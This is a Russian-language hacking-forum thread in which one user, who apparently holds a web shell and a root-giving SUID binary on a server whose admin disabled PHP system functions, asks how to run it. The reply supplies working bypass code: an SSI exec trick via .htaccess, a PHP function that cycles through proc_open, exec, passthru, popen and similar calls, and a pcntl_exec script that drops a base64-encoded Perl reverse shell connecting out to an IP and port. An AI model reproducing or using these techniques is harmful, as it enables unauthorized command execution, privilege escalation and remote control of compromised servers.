Старый 09.12.2012, 22:01   #1
nomad
 
Аватар для nomad
 
Регистрация: 23.07.2010
Сообщений: 179
Репутация: 7
По умолчанию Запуск суидника

Есть шелл, есть скомпилированный суидник на сервере, дающий рута.
После недавних "происков" админа, в php отключены все системные функции, поэтому забиндить порт/сделать бэкконнект я не могу. Да, кроме php, на сервере больше нет ничего. Сервер apache 20020903, PHP Version 5.2.3-pl3-gentoo.
Хелп. Если нужны какие конфиги, скажите.
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica
nomad вне форума   Ответить с цитированием
Старый 10.12.2012, 01:43   #2
chupakabra
 
Аватар для chupakabra
 
Регистрация: 09.12.2011
Сообщений: 47
Репутация: 5
По умолчанию

Попробуй, может сработает что-то из этого:

1) SSI
Код:
	.htaccess
AddType text/html .shtml
AddHandler server-parsed .shtml
Options +Includes
	1.shtml
<pre><!--#exec cmd="id;pwd;ls -lia"-->
2) proc_open, popen, expect_popen и другие функции
Код:
function my_com($in) 
{
	$out = '';
	if (!$out && function_exists('proc_open'))
	{
		$descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r"));
		$process = proc_open($in, $descriptorspec, $pipes, null, null);
		if (is_resource($process))
		{
		    fwrite($pipes[0], "start\n");    // send start
		    echo ("\n\nStart ....".fgets($pipes[1],4096)); //get answer
		    fwrite($pipes[0], "get\n");    // send get
		    echo ("Get: ".fgets($pipes[1],4096));    //get answer
		    fwrite($pipes[0], "stop\n");    //send stop
		    echo ("\n\nStop ....".fgets($pipes[1],4096));  //get answer
		    fclose($pipes[0]);
		    fclose($pipes[1]);
		    fclose($pipes[2]);
		    $out = proc_close($process);  //stop test_gen.php
		}
	}
	elseif (function_exists('exec')) {
		echo "Trying exec:\n";
		@exec($in,$out);
		$out = @join("\n",$out);
	} elseif (function_exists('passthru')) {
		echo "Trying passthru:\n";
		ob_start();
		@passthru($in);
		$out = ob_get_clean();
	} elseif (function_exists('system')) {
		echo "Trying system:\n";
		ob_start();
		@system($in);
		$out = ob_get_clean();
	} elseif (function_exists('shell_exec')) {
		echo "Trying shell_exec:\n";
		$out = shell_exec($in);
	} elseif (is_resource($f = @popen($in,"r"))) {
		echo "Trying popen:\n";
		$out = "";
		while(!@feof($f))
			$out .= fread($f,1024);
		pclose($f);
	} elseif (function_exists('expect_popen'))
	{
		echo "Trying expect_popen:\n";
  		$fp=expect_popen($in); 
  		while(!@feof($fp)){$out .= @fread($fp,1024);}; 
	}
	return $out;
}
my_com('id;pwd;ls -lia');
3) pcntl_exec

Код:
<?php
	$ip = '11.22.33.44';
	$port = '80';
	$perl_path = '/usr/bin/perl';
	$bc_path = '/tmp/bc.pl';
	$bc_code = 'IyEvdXNyL2Jpbi9wZXJsCgp1c2UgU29ja2V0OwoKJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOwoKJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsKCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7Cgpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7Cgpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7CgpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsKCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsKCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsKCnN5c3RlbSgnL2Jpbi9zaCAtaScpOwoKY2xvc2UoU1RESU4pOwoKY2xvc2UoU1RET1VUKTsKCmNsb3NlKFNUREVSUik7';

	file_put_contents($bc_path, base64_decode($bc_code));
	$args = array($bc_path, $ip, $port);
	pcntl_exec($perl_path, $args);
	die("Error pcntl_exec()\n");
?>
chupakabra вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot